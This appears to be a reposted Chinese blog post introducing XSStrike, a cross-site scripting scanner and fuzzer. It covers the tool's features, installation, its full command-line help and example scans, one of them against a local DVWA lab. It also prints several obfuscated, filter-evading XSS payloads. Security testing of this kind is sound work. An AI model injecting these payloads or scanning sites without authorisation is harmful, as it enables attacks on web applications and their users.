标签:注入 bsp 文件 ima img message 检测 mes ams
XSStrike是一个Cross Site Scripting检测套件,配备四个手写解析器,一个智能有效载荷生成器,一个强大的模糊引擎和一个非常快速的爬虫。
XSStrike不是像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析响应,然后通过与模糊引擎集成的上下文分析来保证有效负载。以下是XSStrike生成的有效负载的一些示例:
}]};(confirm)()//<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z </tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z </SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
除此之外,XSStrike还具有爬行,模糊测试,参数发现,WAF检测功能。它还会扫描DOM XSS漏洞。
必须使用pip3安装必要的库:
git clone https://github.com/s0md3v/XSStrike.git cd XSStrike/ pip3 install -r requirements.txt python3 xsstrike.py XSStrike v3.1.1 usage: xsstrike.py [-h] [-u target] [--data paramdata] [-e encode] [--fuzzer] [--update] [--timeout timeout] [--proxy] [--params] [--crawl] [--json] [--path] [--seeds args_seeds] [-f args_file] [-l level] [--headers] [-t threadcount] [-d delay] [--skip] [--skip-dom] [-v] [--blind] optional arguments: -h, --help show this help message and exit -u target, --url target url --data paramdata post data -e encode, --encode encode encode payloads --fuzzer fuzzer --update update --timeout timeout timeout --proxy use prox(y|ies) --params find params --crawl crawl --json treat post data as json --path inject payloads in the path --seeds args_seeds load crawling seeds from a file -f args_file, --file args_file load payloads from a file -l level, --level level level of crawling --headers add headers -t threadcount, --threads threadcount number of threads -d delay, --delay delay delay between requests --skip don‘t ask to continue --skip-dom skip dom checking -v, --vectors verbose output --blind inject blind xss payload while crawling
python3 xsstrike.py -v -u "http://192.168.118.132/dvwa/vulnerabilities/xss_r/?name=test#" --fuzzer --header
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blind
标签:注入 bsp 文件 ima img message 检测 mes ams
原文地址:https://www.cnblogs.com/zhuxr/p/10150555.html